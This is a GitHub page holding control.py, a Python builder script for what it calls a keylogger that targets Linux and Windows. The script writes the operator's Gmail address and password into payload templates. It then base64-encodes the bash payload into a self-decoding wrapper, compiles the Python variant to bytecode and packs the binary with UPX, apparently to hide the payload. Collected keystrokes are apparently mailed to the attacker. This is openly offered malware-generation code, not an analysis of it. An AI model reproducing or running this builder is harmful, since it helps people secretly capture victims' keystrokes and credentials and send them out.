-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathcontrol.py
350 lines (240 loc) · 10.4 KB
/
control.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
import shutil
import subprocess
import smtplib
import time
class colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
print(colors.OKGREEN,colors.BOLD,"""
░█████╗░██████╗░██████╗░██╗░██████╗██╗░░██╗██╗░░░██╗░█████╗░
██╔══██╗██╔══██╗██╔══██╗██║██╔════╝██║░░██║╚██╗░██╔╝██╔══██╗
███████║██║░░██║██████╔╝██║╚█████╗░███████║░╚████╔╝░███████║
██╔══██║██║░░██║██╔══██╗██║░╚═══██╗██╔══██║░░╚██╔╝░░██╔══██║
██║░░██║██████╔╝██║░░██║██║██████╔╝██║░░██║░░░██║░░░██║░░██║
╚═╝░░╚═╝╚═════╝░╚═╝░░╚═╝╚═╝╚═════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝
██████████████████████████████████▀█████▀█████████████
█▄─█─▄█▄─▄▄─█▄─█─▄█▄─▄███─▄▄─█─▄▄▄▄█─▄▄▄▄█▄─▄▄─█▄─▄▄▀█
██─▄▀███─▄█▀██▄─▄███─██▀█─██─█─██▄─█─██▄─██─▄█▀██─▄─▄█
▀▄▄▀▄▄▀▄▄▄▄▄▀▀▄▄▄▀▀▄▄▄▄▄▀▄▄▄▄▀▄▄▄▄▄▀▄▄▄▄▄▀▄▄▄▄▄▀▄▄▀▄▄▀
@kartikhunt3r
""",colors.ENDC)
nmemail = input(colors.BOLD+colors.OKBLUE+"Enter your Gmail Address: "+colors.ENDC)
nmpass = input(colors.BOLD+colors.OKBLUE+"Enter your Password: "+colors.ENDC)
nmtime = int(input(colors.BOLD+colors.OKGREEN+"Enter the time delay for mails: "+colors.ENDC))
#to loop until a correct password is aqquired
try: #Try to execute the code between try: and except:
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
server.ehlo()
server.login(nmemail,nmpass) #<-- SMTPAuthenicationError is raised here.
#Now Python will look for an Except clause that handles that specific error, skipping over the rest of the Try clause.
#Which is printing that we are logged in, which we aren't!
print("verifying Email ...")
except smtplib.SMTPAuthenticationError:
print("Error! Wrong gmail or password.")
exit()
original = r'lib/lib.py'
target = r'linux_exploit.py'
original2 = r'lib/lib.sh'
target2 = r'linux_exploit.sh'
original3 = r'lib/lib.bat'
target3 = r'windows_exploit.bat'
shutil.copyfile(original, target)
shutil.copyfile(original2, target2)
shutil.copyfile(original3, target3)
# creating a variable and storing the text
# that we want to search
search_text = "[email protected]"
search_text2= "passwordVerySecure"
search_text3= "238"
# creating a variable and storing the text
# that we want to add
replace_text = str(nmemail)
replace_text2 = str(nmpass)
replace_text3 = str(nmtime)
# Opening our text file in read only
# mode using the open() function
with open(r'linux_exploit.py', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data = file.read()
# Searching and replacing the text
# using the replace() function
data = data.replace(search_text, replace_text)
# Opening our text file in write only
# mode to write the replaced content
with open(r'linux_exploit.py', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data)
file.close()
# Printing Text replaced
print(colors.BOLD,colors.OKGREEN,"[+] email verified [+]")
with open(r'linux_exploit.py', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data2 = file.read()
# Searching and replacing the text
# using the replace() function
data2 = data2.replace(search_text2, replace_text2)
# Opening our text file in write only
# mode to write the replaced content
with open(r'linux_exploit.py', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data2)
file.close()
# Printing Text replaced
print(colors.BOLD,colors.OKGREEN,"[+] pass verified [+]")
print(colors.BOLD,colors.WARNING,"Please allow less secure apps to your gmail for proper use of this tool.")
with open(r'linux_exploit.py', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data3 = file.read()
# Searching and replacing the text
# using the replace() function
data3 = data3.replace(search_text3, replace_text3)
# Opening our text file in write only
# mode to write the replaced content
with open(r'linux_exploit.py', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data3)
file.close()
#############-------------Linux Exploit--------------------###############
with open(r'linux_exploit.sh', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data = file.read()
# Searching and replacing the text
# using the replace() function
data = data.replace(search_text, replace_text)
# Opening our text file in write only
# mode to write the replaced content
with open(r'linux_exploit.sh', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data)
file.close()
# Printing Text replaced
print(colors.BOLD,colors.OKGREEN,"[+] Creating Linux Exploit [+]")
with open(r'linux_exploit.sh', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data2 = file.read()
# Searching and replacing the text
# using the replace() function
data2 = data2.replace(search_text2, replace_text2)
# Opening our text file in write only
# mode to write the replaced content
with open(r'linux_exploit.sh', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data2)
file.close()
# Printing Text replaced
print(colors.BOLD,colors.OKGREEN,"[+] Bash File Generated [+]")
print(colors.BOLD,colors.WARNING,"Please allow less secure apps to your gmail for proper use of this tool.")
with open(r'linux_exploit.sh', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data3 = file.read()
# Searching and replacing the text
# using the replace() function
data3 = data3.replace(search_text3, replace_text3)
# Opening our text file in write only
# mode to write the replaced content
with open(r'linux_exploit.sh', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data3)
file.close()
#############-------------Windows Exploit--------------------###############
with open(r'windows_exploit.bat', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data = file.read()
# Searching and replacing the text
# using the replace() function
data = data.replace(search_text, replace_text)
# Opening our text file in write only
# mode to write the replaced content
with open(r'windows_exploit.bat', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data)
file.close()
# Printing Text replaced
print(colors.BOLD,colors.OKGREEN,"[+] Creating Windows Exploit [+]")
with open(r'windows_exploit.bat', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data2 = file.read()
# Searching and replacing the text
# using the replace() function
data2 = data2.replace(search_text2, replace_text2)
# Opening our text file in write only
# mode to write the replaced content
with open(r'windows_exploit.bat', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data2)
file.close()
# Printing Text replaced
print(colors.BOLD,colors.OKGREEN,"[+] Batch File Generated [+]")
print(colors.BOLD,colors.WARNING,"Please allow less secure apps to your gmail for proper use of this tool.")
with open(r'windows_exploit.bat', 'r') as file:
# Reading the content of the file
# using the read() function and storing
# them in a new variable
data3 = file.read()
# Searching and replacing the text
# using the replace() function
data3 = data3.replace(search_text3, replace_text3)
# Opening our text file in write only
# mode to write the replaced content
with open(r'windows_exploit.bat', 'w') as file:
# Writing the replaced data in our
# text file
file.write(data3)
file.close()
# Printing Text replaced
print(colors.BOLD,colors.OKGREEN,"setting up mail duration...")
print(colors.BOLD,colors.OKGREEN,"[+]DONE [+]")
print(colors.BOLD,colors.OKGREEN,"Generating Payload ...(this may take few minutes) ...")
anything = '"echo'
anything2 = ' sh" >> '
subprocess.call("apt install upx",shell=True)
subprocess.call(["mkdir", "keylogger"])
subprocess.call("echo '#!/usr/bin/env bash' > keylogger/Keylogger_For_Linux", shell=True)
subprocess.call("echo "+anything+" '$(base64 linux_exploit.sh)' | base64 -d |"+anything2+"keylogger/Keylogger_For_Linux",shell=True)
subprocess.call("python -OO -m py_compile linux_exploit.py",shell=True)
subprocess.call("cp __pycache__/linux_exploit.cpython-310.opt-2.pyc keylogger/keylogger_for_all_OS.py",shell=True)
subprocess.call("cp windows_exploit.bat keylogger/keylogger_for_windows.bat",shell=True)
subprocess.call("rm -r __pycache__",shell=True)
subprocess.call(["rm", "linux_exploit.py"])
subprocess.call(["rm", "linux_exploit.sh"])
subprocess.call(["rm", "windows_exploit.bat"])
time.sleep(2)
subprocess.call("chmod 777 keylogger",shell=True)
subprocess.call("chmod +x keylogger/Keylogger_For_Linux",shell=True)
subprocess.call("chmod +x keylogger/keylogger_for_all_OS.py",shell=True)
subprocess.call("chmod +x keylogger/keylogger_for_windows.bat",shell=True)
subprocess.call("upx keylogger/Keylogger_For_Linux",shell=True)
print(colors.BOLD,colors.OKGREEN,"[+] Keylogger Generated Successfully[+]")